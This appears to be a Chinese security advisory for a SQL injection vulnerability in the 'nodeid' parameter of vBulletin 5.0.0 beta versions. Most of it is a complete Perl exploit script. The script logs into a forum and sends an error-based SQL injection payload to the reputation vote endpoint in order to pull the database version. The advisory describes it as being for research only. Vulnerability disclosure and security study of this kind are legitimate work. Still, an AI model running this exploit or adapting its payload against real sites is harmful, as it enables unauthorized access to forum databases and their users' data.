VBulletin 'nodeid'参数SQL注入漏洞

发布日期:2013-03-24
更新日期:2013-03-30

受影响系统:
VBulletin VBulletin
描述:
--------------------------------------------------------------------------------
BUGTRAQ  ID: 58754
 
vBulletin是一个强大灵活并可完全根据自己的需要定制的论坛程序套件。
 
VBulletin 5.0.0 Beta 11 - 5.0.0 Beta 28及其他版本在 'nodeid' 参数的实现上存在SQL注入漏洞,攻击者可利用此漏洞破坏应用,执行未授权操作。
 
<*来源:Orestis Kourides
  *>

测试方法:
--------------------------------------------------------------------------------

警 告

以下程序(方法)可能带有攻击性,仅供安全研究与教学之用。使用者风险自负!
#!/usr/bin/perl
 use LWP::UserAgent;
 use HTTP::Cookies;
 use HTTP::Request::Common;
 use MIME::Base64;
 system $^O eq 'MSWin32' ? 'cls' : 'clear';
 print "
 +===================================================+
 |          vBulletin 5 Beta XX SQLi 0day          |
 |              Author: Orestis Kourides            |
 |            Web Site:             |
 +===================================================+
 ";
 
 if (@ARGV != 5) {
    print "\r\nUsage: perl vb5exp.pl VBPATH URUSER URPASS
MAGICNUM\r\n";
    exit;
 }
 
 $host      = $ARGV[0];
 $path      = $ARGV[1];
 $username  = $ARGV[2];
 $password  = $ARGV[3];
 $magicnum  = $ARGV[4];
 $encpath    = encode_base64('http://'.$host.$path);
 print "[+] Logging\n";
 print "[+] Username: ".$username."\n";
 print "[+] Password: ".$password."\n";
 print "[+] MagicNum: ".$magicnum."\n";
 print "[+] " .$host.$path."auth/login\n";
 my $browser = LWP::UserAgent->new;
 my $cookie_jar = HTTP::Cookies->new;
 my $response = $browser->post( 'http://'.$host.$path.'auth/login',
    [
        'url' => $encpath,
        'username' => $username,
        'password' => $password,
    ],
    Referer =>
'http://'.$host.$path.'auth/login-form?url=http://'.$host.$path.'',
    User-Agent => 'Mozilla/5.0 (Windows NT 6.1; rv:13.0) Gecko/20100101
Firefox/13.0',
 );
 $browser->cookie_jar( $cookie_jar );
 my $browser = LWP::UserAgent->new;
 $browser->cookie_jar( $cookie_jar );
 print "[+] Requesting\n";
 my $response = $browser->post(
'http://'.$host.$path.'index.php/ajax/api/reputation/vote',
    [
        'nodeid' => $magicnum.') and(select 1 from(select
count(*),concat((select (select concat(0x23,cast(version() as
char),0x23)) from information_schema.tables limit
0,1),floor(rand(0)*2))x from information_schema.tables group by x)a) AND
(1338=1338',
    ],
    User-Agent => 'Mozilla/5.0 (Windows NT 6.1; rv:13.0) Gecko/20100101
Firefox/13.0',
 );
 $data = $response->content;
 if ($data =~ /(#((\\.)|[^\\#])*#)/) { print '[+] Version: '.$1 };
 print "\n";
 exit 1;

建议:
--------------------------------------------------------------------------------
厂商补丁:
 
VBulletin
 ---------
 目前厂商还没有提供补丁或者升级程序,我们建议使用此软件的用户随时关注厂商的主页以获取最新版本:
 

内容版权声明:除非注明,否则皆为本站原创文章。

转载注明出处:http://127.0.0.1/wyyzff.html